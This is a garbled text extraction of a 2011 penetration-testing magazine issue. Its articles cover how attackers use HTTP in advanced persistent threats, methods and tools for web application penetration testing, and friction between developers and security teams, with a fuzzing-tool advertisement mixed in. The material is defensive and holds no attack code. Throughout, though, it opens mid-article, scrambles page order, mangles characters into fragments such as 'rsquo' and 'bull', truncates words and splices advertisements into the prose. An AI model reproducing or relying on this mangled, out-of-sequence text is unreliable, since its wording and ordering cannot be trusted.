In summary any web application old or new needs to be secured by a WAF in Full Proxy Mode Penetration testers should check whether the WAF reliably cloaks system information in order to make attacks on the infrastructure less likely in the first place It should also check whether it prevents the hacking of the application itself with common or new means whether it secures all the backend systems the application connects to and it stops leakage of sensitive data when the web application has weaknesses which the WAF cannot level out If penetration testers are not only looking for a security snap shot but want to help their customers in creating sustainable security they should always include the WAFrsquos administration into their assessment
OLIVER WAIOliver Wai leads product marketing for Barracudarsquos line of Web application security and application delivery product lines In his role Oliver is a core member of Barracudarsquos security incident response team and writes frequently about the latest application security threats Prior to Barracuda Networks Oliver held positions at Google Integration Appliance and Brocade Communications Oliver has an MS in Management Science amp Engineering from Stanford University and BS (Cum Laude) in Computer Engineering from Santa Clara University
In the upcoming issue of the
If you would like to contact Pentest team just send an email to enpentestmagcom We will reply immediately We will reply asap
Web Session Management
Password management in code
ETHical Ghosts on SF1
Preservation namely in the online gambling industry
Cyber Security War
Available to download on December 22th
trade
To Do Listhellip
nalyzing oftware ecurity tilizing isk valuationtrade
Scan code for more on the state of software security
Know your softwarersquos pedigree Get ASSUREtrade
Learn more about software security assurance by visiting or by calling +1 (678) 809-2100
- Cover13
- EDITORrsquoS NOTE
- CONTENTS
- CONTENTS 213
- The Significance Of HTTP And The Web For Advanced Persistent 13Threats
- Web 13Application Security and Penetration Testing
- Developersare from Venus Application Security guys from 13Mars
- Pulling the Legs of 13Arachni
- XSS Beef Metaspoilt 13Exploitation
- Cross-site Request Forgery 13IN-DEPTH ANALYSIS bull CYBER GATES bull 2011
- First the Security Gate then the Airplane What needs to be heeded when checking web 13applications
-
ADVANCED PERSISTENT THREATS
Page 6 httppentestmagcom012011 (1) November Page 7 httppentestmagcom012011 (1) November
The omnipresence of the Web is now a given and it serves a wide variety of situations as detailed n the non-exhaustive list below
bull Community applicationsbull Institutional Web sites bull Online transactionsbull Business applicationsbull IntranetExtranetbull Entertainmentbull Medical databull Etc
In response to user requirements and developing needs content driven by HTTP has become incre-asingly rich and dynamic It even goes as far as incorporating script languages that transform the Web browser into a universal enhanced client that espouses different platforms PC Mac and Mobile users all form part of the connected masses operating on their chosen platforms But have these new privileges arrived without any underlying constraints
The race towards sophistication has not been accompanied by similar developments in respect of the security and reliability of data circulated across the Web A concrete example is the fact that HTTP does not provide native support for sessions and it is therefore
difficult to be sure that requests received during browsing emanate from the same user Large scale use of the Web illustrates the
discrepancy that exists in terms of security versus volume and this inherent flaw has become a major IT system issue making HTTP a preferred vector of attacks and data compromise
Cybercriminals are aware of the exploitability of the Web and have made it their number one target Not a week goes by without a an organization being compromised via HTTP
bull Playstation Network (Sony) -gt Wordpress version problem
bull MySQL (Oracle) -gt SQL Injectionbull RSA (EMC) -gt SQL Injectionbull TJX -gt SQL Injection
The above attacks conceived and carried out with precise attention to logistics are by no means an innovation but we now refer to them differently using the term APT Advanced Persistent Threat
Bolstered cyber-activity the discovery of intrusion and updated legislation entailing mandatory declaration of incidents collectively lead to extensive media coverage which in turn amplifies the impact on the image of the unfortunate victims that are more often than not high-profile businesses or international organizations
The SignificanceOf HTTP And The Web For Advanced Persistent
Threats
Initially created in 1989 by Tim Berners-Lee of the CERN Hypertext Transfer Protocol (HTTP) was actually launched one year later and continues to use specifications that date to 1999 ndash a mere time lapse of twenty-two years in the transmission of Web-based content
ADVANCED PERSISTENT THREATS
Page 6 httppentestmagcom012011 (1) November Page 7 httppentestmagcom012011 (1) November
The use of HTTP may be required because different areas are often filtered out leaving only necessary protocols to emerge HTTP is often left open to allow administrators to navigate through these machines or to update them
To remain as stealthy as possible a strategic backdoor to the Web application or the application server will use HTTP as a direct connection and or as a tunnel to other applications During the movement it will not be filtered and no attention will be drawn to a process that opens a port unknown to the system
Bounce MechanismsWhenever changes occur witin an IT system the steps involving initial intrusion and continued presence are repeated as many times as necessary until it the goal is attained and sensitive data becomes accessibleHTTP once again comes into play during these stages of development because it is predominantly active and open between the different areas
bull Dialogue between server applicationsbull Web Servicesbull Web Administration Interfacebull Etc
It often happens that security policies contain the same weaknesses from one area to another
bull Exit ports openedbull Filtering omission on higher level portsbull Use of the same default passwords
Data ExtractionOnce crucial information is reached it is necessary to quit the system as discreetly as possible and over a certain length of time HTTP protocol is often enabled for exit without being monitored for several reasons
bull Machines are often updated using HTTP bull When an administrator logs on to a remote
machine he will often require access to a website bull Since these areas are often regarded as bdquosaferdquo
zones restrictions are lower and controls less strict
What Protective Measures Can Be DeployedApplication security has become major issue in the business world Whereas network security is fairly conventional and primarily leans on the filtering of destinations sources IP and Ports in most cases application security is more complex and involves applications that are often unique bespoke and
Anatomy of an APTAdvanced Persistent Threats are attacks calculated for latent effect and vested with a specific purpose that of retrieving sensitive or critical data
Several steps are necessary to reach the goal
bull The initial intrusionbull Continued presence within the IT systembull Bounce mechanism and in depth infiltrationbull Data extraction
HTTP plays an important role during the attacks firstly because it is predominantly present during the various stages and furthermore because it is often the only available protocol that can serve as an attack vector
The Initial IntrusionThe system is invaded by an attack focused on an area exposed to the public on the Internet In the case of Sony Playstation Network for instance the intrusion took place via their blog that used a vulnerable version of WordPress
These days it is unusual for any organization to do without a website and the latter can range from basic and simple to complex and dynamic
The website plays the role of a gateway that provides the initial point of entry into an infrastructure It becomes an outpost that enables important information to be gathered in order to successfully carry out the rest of the attack In addition depending on the application infrastructure location and lack of compartmentalization it is possible for a simple scarcely-used application to be found near or on the same server as a business application The attack will bounce from the one to the other and the business application which will then become accessible and provide more access privileges
Retrieval of information is often the vital issue during the bounce mechanism and and extended infiltration intothe system Some examples of the data targeted
bull User Passwords bull Hardware and network destinations -gt discoverybull Connectors to other systems -gt new protocolsbull Etc
Continued presenceAfter the initial inroads into the structure the next phase requires that presence within the system remains secure The machine has to be re-accessed and exploited without arousing the suspicions of system administrators
ADVANCED PERSISTENT THREATS
Page 8 httppentestmagcom012011 (1) November Page 9 httppentestmagcom012011 (1) November
deployed with many more specifications relating to infrastructureThree steps are necessary to prevent or respond properly to an APT
bull Preventionbull Responsebull Forensics
PreventionIdeally security should be addressed at the very beginning when software and even the application infrastructure are still at the conception stage It is necessary to follow certain rules which will condition the response to different threats
Define a Secure Application InfrastructurePartition the NetworkThis measure is one of the pillars of the PCI-DSS and for good reason Keeping sections separate can limit the impact of an intrusion making it more difficult to obtainsatisfaction because of the large number of bounces required to attain sensitive data Each zone also deploys a security policy adapted to its content whether the flow is inbound or outbound
Moreover partitioning allows for easier forensic analysis in case of a compromise It is easier to understand the steps and measure the impact and the depth of the attack when one is able to analyze each area separately Unfortunately there are many systems described as flat infrastructures that contain a variety of applications housed in the same area After an incident has occurred it is difficult to determine precisely which applications have been compromised and what data has been hijacked
Separation of ApplicationsApplications can be separated using criteria such as data categorization or the level of risk attached to the application Clustering provides numerous advantages
bull It promotes rationalization in the design of security policies which are more or less complex depending on the type of data and the structure of the application to secure
bull It enhances understanding of an attack and by doing so facilitates the search for evidence which will then be based on the criticality of data and complexity of applications
Anticipate Possible OutcomesTo better understand the scope of an attack it is necessary to anticipate the options available to a
hacker once an application has been compromised Once this is done it is necessary to anticipate the procedures required to analyze verify and understand the attack We should bear in mind that an area of the infrastructure in which it is impossible to install a monitoring tool will be very complex to analyze during an incident In such a case it is necessary to predefine the tools and procedures for investigations and or monitoring
Risk analysis and attack guidelinesThis step allows a precise understanding of risks based on the data manipulated by applications
It has to be carried out by studying web applications their operation and business logic
Once each data component has been identified it is possible to draw up a list of rules and regulations that need to be followed by the application infrastructure
Developer TrainingApplications are commonly developed following specific business imperatives and often with the added stress of meeting availability deadlines Developers do not place security high up on their list of priorities and it is often overlooked in the process
However there are several ways to significantly reduce risk
bull Raising developer awareness of application attacksbull OWASP TOP10bull WASC TC v2
bull The use of libraries to filter inputbull Libraries are available for all languages
bull Setting up audit functions logs and traceabilitybull Accurate analysis of how the application works
Regular Auditing Code analysisYou can resort to manual code analysis by an auditor or to automated analysis by using the tools available to find vulnerabilities in the source code of web applications These tools often require complex configuration This step is useful to detect vulnerabilities before going into production and thus to fix them before they are exploited
Unfortunately the practice is only possible if you have access to the source code of the application Closed source software packages cannot be analyzed
Scanning and penetration testingAll applications can be scanned and pentested They also require configuration and or a thorough analysis of the application to determine the credentials necessary
ADVANCED PERSISTENT THREATS
Page 8 httppentestmagcom012011 (1) November Page 9 httppentestmagcom012011 (1) November
for navigation or resources to be avoided because of their capacity to cause significant damage (eg links enabling the deletion of entries in the database)
These tests have to be reproduced as often as possible and whenever a change in the application is put in place by developers
Appropriate ResponseTraditional firewalls do not filter network application protocols at best the so-called next-generation model can recognize a type of protocol and filter content in the manner of an IPS by recognizing attack patterns This response is clearly inadequate
Each zone containing web applications has to be filtered on incoming and outgoing content and on the use of the protocol itself
This type of deployment is often called deep defense and has the ability to monitor the various attacks at both the application and network levels
Last but not least the association of the identity context with security policy allows better detection of anomalies
Traffic Filtering The WAF (Web Application Firewall)Web application firewalls can be considered as an extension of application network firewalls They are able to analyze HTTP and the content it conveys The device is strongly recommended by section 66 of PCI-DSS
Often used in reverse proxy mode it allows for a break in protocol and facilitates the restructuring of areas between applications
The WAFEC document (Web Application Firewall Evaluation Criteria) published by WASC is a useful guideline that helps to understand and evaluate different vendors as needed
The WAF also helps to monitor and alert in case of threat in order to trigger a rapid response (eg blocking the IP of the attacker via a dialogue protocol with network firewalls)
Traffic Filtering The WSF (Web Services Firewall)It represents an extension of the WAF on the protocols carrying XML traffic over HTTP such as SOAP or REST
XML and its standards make security management easier in the sense that the operation of the service is described by documents generated directly by the development framework (eg WSDL Schemas)
Web services are vulnerable to the same attacks as web applications they consequently need the same
kind of protection Their position in the application infrastructure however is much more critical They are often located at the heart of sensitive information zones and connected directly via private links to partner infrastructures
The WSF provides security on the message format and content but also on the use of a service The use or production of a web service entails contract between two parties on the type of use (eg number of messages per day data type etc) The WSF will also serve to monitor this function and to ensure respect of SLA between the two parties
Authentication AuthorizationApplications use identities to control access to various resources and functions
The association of the identity context and security increases efficiency in the detection of anomalies For example a whitelist adapted according to the type of user can verify access to information based on user role
Ensuring Continuity of ServiceApplication security is primarily related to the exploitation of vulnerabilities in order to divert normal use for malicious purposes
However some attacks based on weaknesses can be devastating in effect perpetrated to make the application unavailable and thereby provoke losses due to activity downtime
To retaliate it is necessary to establish protective measures that block denial of service and automated processes and to ensure load balancing and SSL acceleration
OperationMonitoringIt is important to understand the use of the application during production to monitor and detect abnormal behavior and make decisions accordingly
bull Blacklistbull Legal Actionbull Redirection to a honeypot
Log CorrelationUnderstanding abnormal behavior in an application helps in locating an attack
An application infrastructure can comprise hundreds of applications
To understand the attack as a whole and monitor changes (discovery aggression compromise) it is necessary to have holistic view
ADVANCED PERSISTENT THREATS
Page 10 httppentestmagcom012011 (1) November
To do this it is imperative to confront and correlate logs correlation to obtain real-time overall analysis and understand the threat mechanics
bull Mass Attack on a type of applicationbull Attack targeting a specific applicationbull Attacks focused on a type of data
Reporting and AlertingThe dialogue between application network and security teams is often complex within an organization Formalized reports on attacks and the use of the application provide a basis for work and an understanding of application threats for these teams
Alerts will enable them to react and trigger procedures either at the network level by blocking the IP of the attacker or at the application level by forbidding access to resources areas or more directly by referral to a honeypot in view of analyzing the behavior of the attacker
ForensicsUnderstanding the scope of an attackFor each area compromised it is important to understand what elements have been impacted and to trace the attack to the roots of the intrusion and compromise by the installation of a backdoor bounce mechanisms to other areas and or extraction of data
Analysis of application componentsTo understand how the intrusion occurred it is
important to look for abnormal uses One example could be the presence of anomalous data in a variable a cookie To drill down to this level the logs of the various application components turn out to be very useful
bull Web server or applicationbull Databasebull Directorybull Etc
Systems AnalysisTo understand how the attacker remained in the area it is important to identify the type of backdoor used From the simplest act such as the placing an executable file in the application itself to the injection of code into a process (eg hook network functions) it is necessary to analyze the system hosting the application
bull Changed configuration filesbull Users addedbull Security rules changed
bull Errors of execution or increase in privileges
bull Unknown daemons or unusual groups and users bull Etc
Analysis of network equipmentDuring the various bounces within the application infrastructure the discovery and exploration of new possibilities leaves fingerprints Network firewalls keep precious logs with traces of these attempts In addition if access is logged it is important to check if there are connections to web applications at unusual times
The End justifies the MeansIn conclusion we can see that the means used to achieve an APT are often substantial and proportional to the criticality of targeted data APT are not just temporary attacks but real and constant threats with latent effect that need to fought in the long run
The security of an application infrastructure begins with the conception process and requires basic rules to be respected to simply security operations
Real-life experience of application management highlights difficulties in implementing all the good practices
A comprehensive study of threats appropriate response and anticipation of possible incidents are now the recommended procedure in dealing with application attacks
MATTHIEU ESTRADEMatthieu Estrade has 14 years experience in internet security In 2001 Matthieu designed a pioneering application rewall based on Web Reverse Proxy Technology for the company Axiliance As a well known specialist in his eld he soon became a member of the Open Source Apache HTTP server development team His security expertise has been put to contribution in WASC (Web Application Security Consortium) projects like WAFEC and WASSEC Matthieu is also a member of the French OWASP chapter Matthieu is currently CTO at BeeWare
a d v e r t i s e m e n t
WEB APP SECURITY
Page 12 httppentestmagcom012011 (1) November
Dynamic web applications usually use technologies such as ASP ASPNet PHP Ajax JSP Perl Cold Fusion Flash and etc
These applications expose financial data customer information and other sensitive and confidential data that required authentication and authorization Ensuring that the web applications are secure is a critical mission that businesses have to go through to achieve the desired security level of such applications With the accessibility of such critical data to the public domain web application security testing also becomes paramount process for all the web applications that are exposed to the outside world
IntroductionPenetration testing (It is also called Pen Testing) is usually conducted by ethical hackers where the security team reviews application security vulnerabilities to discover potential security risks Such process requires a deep knowledge experience in a variety of different tools and a range of exploits that can achieve the required tasks
During the pen testing different web applicationsrsquo vulnerabilities are tested (eg Input Validation Buffer Overflow Cross Site Scripting URL Manipulation SQL Injection Cookie Modification Bypassing Authentication and Code Execution) A typical pen testing involves the following procedures
bull Identification of Ports ndash In this process ports are scanned and the associated services running are identified
bull Software Services Analyzed ndash In this process both automated and manual testing is conducted to discover weaknesses
bull Verification of Vulnerabilities ndash This process helps verify that the vulnerabilities are real where weakness might be exploited to help remediate the issues
bull Remediation of Vulnerabilities ndash In this process the vulnerabilities will be resolved and such vulnerabilities will be re-tested to ensure they have been addressed
Part of the initiative of securing the web applications is to include the security development lifecycle as part of the software development lifecycle where the number of security-related design and coding defects can be reduced and also the severity of any defects that do remain undetected can be reduced or eliminated Despite the fact that the above initiatives solve some of the security problems some of undiscovered defects will remain even in the most scrutinized web applications Until scanners can harness true artificial intelligence and put the anomalies into context or make normative judgments about them the struggle to find certain vulnerabilities will exist
WebApplication Security and Penetration Testing
In the recent years web applications have grown dramatically within many organizations and businesses where such entities became very independent on such technology as part of their businessesrsquo lifecycle
Automated Scanning vs Manual Penetration TestingA vulnerabilities assessment simply identifies and reports vulnerabilities whereas a pen testing attempts to exploit vulnerabilities to determine whether unauthorized access to other malicious activities is possible By performing a pen testing to simulate an attack itrsquos possible to evaluate whether an application has any potential vulnerabilities resulting from poor or improper system configuration hardware or software flaws or weaknesses in the perimeter defences protecting the application
With more than 75 of the attacks occurring over the HTTPS protocols and more than 90 of web applications containing some type of security vulnerability it is essential that organizations implement strong measures to secure their web applications Most of these attacks occur on the front door of the organization where the entire online community has an access to these doors (ie port 80 and port 443) With the complexity and the tremendous amount of sensitive data exist within web applications consumers not only expect but also demand security for this information
That said securing a web application goes far beyond testing the application using automated systems and tools or by using manual processes The security implementation begins in the conceptual phase where the modeling of the security risk is introduced by the application and the countermeasures that are required to be implemented It is imperative that the web application security should be thought of as another quality vector of every application that has to be considered through every step of the application lifecycle
Discovering web application vulnerabilities can be performed through different processes
bull Automation process ndash where scanning tools or static analysis tools will be used
bull Manual process ndash where penetration testing or code review will be used
Web application vulnerability types can be grouped into two categories
Technical VulnerabilitiesWhere such vulnerabilities can be examined through the following tests Cross-Site-Scripting Injection Flaws and Buffer Overflow Automated systems and tools which analyze and test the web applications are much better equipped to test for technical vulnerabilities than the manual penetration tests While automated testing and scanning tools may not be able
012011 (1) November
WEB APP SECURITY
Page 14 httppentestmagcom012011 (1) November Page 15 httppentestmagcom012011 (1) November
to address 100 of all the technical vulnerabilities there is no reason to believe that such tools will achieve such goal in the near future Current problems facing the web application tools are the following client-side generated URLs required JavaScript functions application logout transaction-based systems requiring specific user paths automated form submission one time passwords and Infinite web sites with random URL-based session IDs
Logical VulnerabilitiesWhere such vulnerabilities can manipulate the logic of the application to do tasks that were never intended to be done While both an automated scanning tool and skilled penetration tester can navigate through a web application only the latter is able to understand what the logic behind specific workflow or how the application works in general Understanding the logic and the flow of an application allows the manual pen testing to subvert or overthrow the business logic where security vulnerabilities can be exposed For instance an application might direct the user from point A to point B to Point C based on the logic flow implemented within the application where point B represents a security validation check A manual review of the application might show that it is possible for attackers to manipulate the web application to go directly from point A to point C and bypassing the security validation exists at point B
History has proven that software bugs defects and logical flaws are consistently the primary cause of commonly exploited application software vulnerabilities where it can lead to unauthorized access to the systems networks and application information It is also proven that most of the security breaches occur due to vulnerabilities within the web application layer (ie attacks using the HTTPHTTPS protocol) In such attacks traditional security mechanism such as firewalls and IDS provide little or no protection against attacks on the web applications
Security analyses review the critical components of a web-based portal e-commerce application or web services platform Part of the analyses work that can be done is to identify vulnerabilities inherent in the code of the web application itself regardless of the technology implemented back-end database or web server used by the application
Itrsquos imperative to point out that the web application penetration assessments should be designed based upon defined threat-model It should also be based upon the evaluation of the integration between components (eg third party components and in-house built components) and the overall deployment configuration that represents a solid choice for establishing a baseline security assessment Application penetration assessments server as a cost-effective mechanism to identify a set of vulnerabilities in a given application where it exposes the most likely exploit vulnerabilities
Figure 1 The different activities of the Pen Testing processes
WEB APP SECURITY
Page 14 httppentestmagcom012011 (1) November Page 15 httppentestmagcom012011 (1) November
and allow to find similar instances of vulnerabilities throughout the code
How Web Application Pen Testing WorksMost of the web applicationsrsquo penetration testing is carried out from security operations centers where the access to the resources under test will be remotely over the Internet using different penetration technologies At the end of such test the application penetration test provides a comprehensive security assessment for various types of applications (eg commercial enterprise web applications internally developed applications web-based portal and e-commerce application) Figure-1 describes some of the activities that usually happen during the pen testing process Some of the testing processes that are used to achieve the security vulnerabilities assessment such as Application Spidering Authentication Testing Session Management Testing Data Validation Testing Web Service Testing Ajax Testing Business Logic Testing Risk Assessment and Reporting
In conducting the web penetration testing different approaches can be used to achieve the security vulnerabilities assessment some of these approaches are
bull Zero-Knowledge Test (Black Box) ndash In such ap-proach the application security testing team will not have any of inside information about the target
environment and the expected knowledge gain will be based on information that can be found out in the public domain This type of test is designed to provide the most realistic penetration test possible since in many cases attackers start with no real knowledge of the target systems
bull Partial Knowledge Test (Gray Box) ndash In such ap-proach a partial gain of knowledge about the environment under testing will be achieved before conducting the test
bull Source Code Analysis (White Box) ndash In such ap-proach the penetration test team has fill information about the application and its source code In such test the security team will do a code review (line-by-line) in attempt to find any flaws that could allow attackers to take control of the application perform a denial of service attack against it or use such flaws to gain access to the internal network
Itrsquos also important to point out that penetration testing can be achieved through two different types of testing
bull External Penetration Testing bull Internal Penetration Testing
Both types of testing can be conducted with least information (black box) and also can be conducted with limited information (white box)
Figure 2 The different phases of the Pen Testing
WEB APP SECURITY
Page 16 httppentestmagcom012011 (1) November Page 17 httppentestmagcom012011 (1) November
Figure-3 shows different procedures and steps that can be used to conduct the penetration testing The following are the description of these steps
bull Scope and Plan ndash In this step the scope of the penetration testing is identified and the project plan and resources will be defined
bull System Scan and Probe ndash In this step the system scanning under the defined scope of the project will be conducted where the automated scanners will examine the open ports scanning the system to detect vulnerabilities and hostnames and IP addresses previously collected will be used at this stage
bull Creating of Attack Strategies ndash In this step the testers prioritize the systems and the attack methods will be used based on the type of the system and how critical these systems Also in this stage the penetration testing tools will be selected based on the vulnerabilities detected from the previous phase
bull Penetration Testing ndash In this step the exploitation of vulnerabilities using the automated tools will be conducted where the attacking methods designed in the previous phase will be used to conduct the following tests data amp service pilferage test buffer overflow privilege escalation and denial of services (if applicable)
bull Documentation ndash In this step all the vulnerabilities discovered during the test are documented evidence of exploitation and penetration testing findings are also recommended to be presented later within the final report
bull Improvement ndash The final step of the penetration testing is to provide the corrective actions on
closing the discovered vulnerabilities within the systems and the web applications
Web Applications Testing ToolsThrough the Pen testing a specific structure methodology has to be followed where the following steps might be used Enumeration Vulnerabilities Assessment and Exploitation Some of the tools that might be used within these steps are
bull Port Scannersbull Sniffersbull Proxy Serversbull Site Crawlersbull Manual Inspection
The output from the above tools will allow the security team to gather information about the environment such as Open ports Services Versions and Operating Systems The vulnerabilities assessment utilizes the data gathered in the previous step to uncover potential vulnerabilities in the web server(s) application server (s) database server (s) and any intermediary devices such as firewalls and load-balancers Itrsquos also important for the security team not to rely solely on the tools during the assessment phase to discover vulnerabilities manual inspection for items such as HTTP responses hidden fields and HTML page sources should be part of the security assessment as well
Some of the areas that can be covered during the vulnerabilities assessment are the following
bull Input validationbull Access Control
Figure 3 Testing techniques procedures and steps
WEB APP SECURITY
Page 16 httppentestmagcom012011 (1) November Page 17 httppentestmagcom012011 (1) November
bull Authentication and Session Management (Session ID flaws) Vulnerabilities
bull Cross Site Scripting (XSS) Vulnerabilities bull Buffer Overflowsbull Injection Flawsbull Error Handlingbull Insecure Storagebull Denial of Service (if required)bull Configuration Managementbull Business logic flawsbull SQL Injection faultsbull Cookie manipulation and poisingbull Privilege escalationbull Command injectionbull Client side and header manipulation bull Unintended information disclosure
During the assessment testing the above vulnerabilities is performed except those that could cause a Denial of Service conditions and usually discussed beforehand Possible options of Denial of Service testing include testing during a specific time testing a development system or manually verifying the condition that may be responsible for the vulnerability Once the vulnerabilities assessment is complete the final reports recommendations and comments are summarized and better solutions are suggested for the implementation process Once the above assessments are done the penetration test is half-way done and the most important part of the assessment has to be delivered which is the informative report thatrsquos highlights all the risks found during the penetration phase
The following are some of the commonly used tools for traditional penetration testing
Port ScannersSuch tools are used to gather information about which network services are available for connection on each target host The port scanning tools usually examines or questions each of the designated network ports or service on the target system Most of these tools are able to scan both TCP as well as UDP ports Another common feature of port scanners is their ability to examine the operating system type and its version number since protocol such as TCPIP implementation can vary in their specific responses The configuration flexibility in the port scanners serve examining the different port configuration as well as employ the ability to hide from the network intrusion detection mechanisms
Vulnerability ScannersWhile port scanners only produce an inventory of the types of available services the vulnerability scanners
attempt to exercise vulnerabilities on their targeted systems The main goal of the vulnerability scanners is to provide an essential means of meticulously examining each and every available network service on the targeted hosts These scanners work from a database of documented network service security defects and exercising each defect on each available service of the target hosts Most of the commercial and the open source scanners scan the operating system for known weaknesses and un-patched software as well as configuration problems such as user permission management defects or problem with file access controls Despite the fact that both network-based and host-based vulnerability scanners do little to help web application-level penetration test they are fundamental tools for any penetration testing Good examples for such tools are Internet Scanners QualysGuard or Core Impact
Application ScannersMost of the application scanners can observe the functional behaviour of an application and then attempt a sequence of common attacks against the application Popular commercial application scanners include Appscan and WebInspect
Web application Assessment ProxyAssessment proxies work by interposing themselves between the web browsers used by the testers and the target web server where data can be viewed and manipulated Such flexibility adds different tricks to exercise the applicationrsquos weaknesses and its associated components For example the penetration testers can view all cookies hidden HTML fields and other data used by the web application and attempt to manipulate their values to trick the application
The above penetration testing practice called a black box testing Some organizations use hybrid approaches where the traditional penetration testing along with some level of source code analysis of the web application is used Most of the penetration testing tools can perform the penetration testing practices however choosing the right tool for the job is something vital for the success of the penetration process and the accurate results
The following are some of the common features that should be implemented within the penetration testing tools
bull Visibility ndash The tool must provide the required visibility for the testing team that can be used as a feedback and reporting feature of the test results
bull Extensibility ndash The tool can be customized and it must provide scripting language or plug-in
WEB APP SECURITY
Page 18 httppentestmagcom012011 (1) November
capabilities that can be used to construct cust-omized the penetration testing
bull Configurability ndash Having the tool that can be configurable is highly recommended to ensure the flexibility of the implementation process
bull Documentation ndash The tool should provide the right documentation that can provide clear explanation for the probes performed during the penetration testing
bull License Flexibility ndash The tool that has the flexibility of use without specific constraints such as a particular IP range of numbers and license limits is a better tool than others
Security Techniques for Web Apps Some of the security techniques that can be implemented within the web application to eliminate vulnerabilities are
bull Sanitize the data coming from the browser ndash Any data that is sent by the browser can never be trusted (eg submitted form data uploaded files cookies data XML etc) If web developers fail to sanitize the incoming data from unwanted data it might lead to vulnerabilities such as SQL injection cross site scripting and other attacks against the web application
bull Validate data before form submission and manage sessions ndash To avoid Cross Site Request Forgery (CSRF) that can occur when a web application accepts form submission data without verifying if it came from a user web form It is imperative for the web application to verify that the user form is the one that the web application had produced and served
bull Configure the server in the best possible way ndash network administrators have to follow some guidelines for hardening the web servers Some of these guidelines are Maintain and update proper security patches kill all the redundant services and shutdown unnecessary ports confine access rights to folders and files employ SSH (Secure Shell network protocol) rather than using telnet or FTP and install efficient anti-malware software
In addition to the above guidelines it is always important to implement strong passwords for the web applications users and cleaning stored passwords
ConclusionA vulnerability assessment is the process of identifying prioritizing quantifying and ranking the vulnerabilities in a system where such process determines if there is
a weakness or vulnerabilities in the system subjected to the assessment Penetration testing includes all of the process in vulnerabilities assessment plus the exploitation of vulnerabilities found in the discovery phase
Unfortunately an all clear result from a penetration test doesnrsquot mean that an application has no problems Penetration tests can miss weakness such as session forging and brute-forcing detection and as such implementing security throughout an applicationrsquos lifecycle is imperative process for building secure web applications
As automated web application security tools have matured in the recent years and over time automated security assessment will continue to both reduce any uncertainty of determination (ie false positive results) and the potential to miss some issues (ie false negatives results)
Both automated and manual penetration testing can be used to discover critical security vulnerabilities in web applications Currently the automated tools canrsquot be entirely used as a replacement of the manual penetration test However if the automated tools are used correctly organizations can save a lot of money and time in finding broad range of technical security vulnerabilities in web applications The manual penetration testing can be used to augment the results of the logical vulnerabilities found as a result of using the automated testing
Finally it is important to point out that over time the manual testing for technical vulnerabilities will increase from difficult to impossible as web applications size and the scope of such applications and their complexity increase The fact that many enterprise organizations will not be able to dedicate the time money and the effort required to assess the thousands of web applications will increase the chances of using the automated tools rather than using the human factor to manually testing these applications Also relying on human efforts to test for thousands of technical vulnerabilities within these applications is subject to the human errors and simply canrsquot be trusted
BRYAN SOLIMANBryan Soliman is a Senior Solution Designer currently working with Ontario Provincial Government of Canada He has over twenty years of Information Technology experience with Bachelor degree in Engineering bachelor degree in Computer Science and Master degree in Computer Science
WHAT IS A GOOD FUZZING TOOLFuzz testing is the most efficient method for discovering both known and unknown vulnerabilities in software It is based on sending anomalous (invalid or unexpected) data to the test target - the same method that is used by hack-ers and security researchers when they look for weaknesses to exploit There are no false positives if the anomalous data causes abnormal reaction such as a crash in the target software then you have found a critical security flaw
In this article we will highlight the most important requirements in a fuzzing tool and also look at the most common mistakes people make with fuzzing
Documented test cases When a bug is found it needs to be documented for your internal developers or for vulnerability management towards third party developers When there are billions of test cases automated documentation is the only possi-ble solution
Remediation All found issues must be reproduced in order to fix them Network recording (PCAP) and automated reproduction packages help you in delivering the exact test setup to the develop-ers so that they can start developing a fix to the found issues
MOST COMMON MISTAKES IN FUZZINGNot maintaining proprietary test scripts Proprietary tests scripts are not rewritten even though the communication interfaces change or the fuzzing platform becomes outdated and unsupported
Ticking off the fuzzing check-box If the requirement for testers is to do fuzzing they almost always choose the quick and dirty solution This is almost always random fuzzing Test requirements should focus on coverage metrics to ensure that testing aims to find most flaws in software
Using hardware test beds Appliance based fuzzing tools become outdated really fast and the speed requirements for the hardware increases each year Software-based fuzzers are scalable in performance and can easily travel with you where testing is needed and are not locked to a physical test lab
Unprepared for cloud A fixed location for fuzz-testing makes it hard for people to collaborate and scale the tests Be prepared for virtual setups where you can easily copy the setup to your colleagues or upload it to cloud setups
PROPERTIES OF A GOOD FUZZING TOOLThere are abundance of fuzzing tools available How to distin-guish a good fuzzer what are the qualities that a fuzzing tool should have
Model-based test suites Random fuzzing will certainly give you some results but to really target the areas that are most at risk the test cases need to be based on actual protocol models This results in huge improvement in test coverage and reduction in test execu-tion time
Easy to use Most fuzzers are built for security experts but in QA you cannot expect that all testers understand what buffer overflows are Fuzzing tool must come with all the security know-how built-in so that testers only need the domain expertise from the target system to execute tests
Automated Creating fuzz test cases manually is a time-consuming and difficult task A good fuzzer will create test cases automatically Automation is also critical when integrating fuzzing into regression testing and bug reporting frameworks
Test coverage Better test coverage means more discovered vulnerabilities Fuzzer coverage must be measurable in two aspects specification coverage and anomaly coverage
Scalable Time is almost always an issue when it comes to testing User must also have control on the fuzzing parameters such as test coverage In QA you rarely have much time for testing and therefore need to run tests fast Sometimes you can use more time in testing and can select other test completion criteria
WEB APP SECURITY
Page 20 httppentestmagcom012011 (1) November Page 21 httppentestmagcom012011 (1) November
Application Security members are considered like the tax man asking for money Security is sometimes seen as a cost to pay in order to get
an application into Production Actually it is a little of everyones fault Since Security people and Developers usually do not talk the same language it is difficult for the two groups to work together and give each other the necessary attention and feedback that they deserve Letrsquos take a step back for a minute and let me clarify what I mean about language and communication Consider this scenario The Marketing department has asked for a brand new web portal that shows new products from the ACME corporation Marketers usually do not know anything about technology and they just want to hit the market with an aggressive campaign on the new product line Marketers might ask the developers something like Give us the latest Web 20 Social website enabled or something like that to impress the customers Plus they would like it as soon as possible and they provide a deadline that the developers must keep The developers brainstorm the idea write out some specifications and requirements start prototyping their ideas and eventually begin coding They are under pressure to meet the deadline and management usually presses even more to meet the proposed deadline Security slowly is pushed aside so that the coding and production can meet the deadline Most software architecture is not designed with security in mind and in project Gantt Charts there usually
are no security checkpoints included for code testing or allow time for security fixes or remediation
Developers are pushed to code the application so that they can meet the deadline Acceptance tests and functionality tests are passed and the application is almost ready for deployment when someone recalls something about security Hey we need to get this on-line So we need to open up firewall to allow access to it
The Security Application group asks for additional information about the application and request docu-mentation of how the application was built They do not see it from the developersrsquo point of view of meeting the deadline that Management has imposed on them
On the other side developers do not see the problem from a security perspective What risks to IT infrastructure will potentially be exposed if someone breaks into the new application
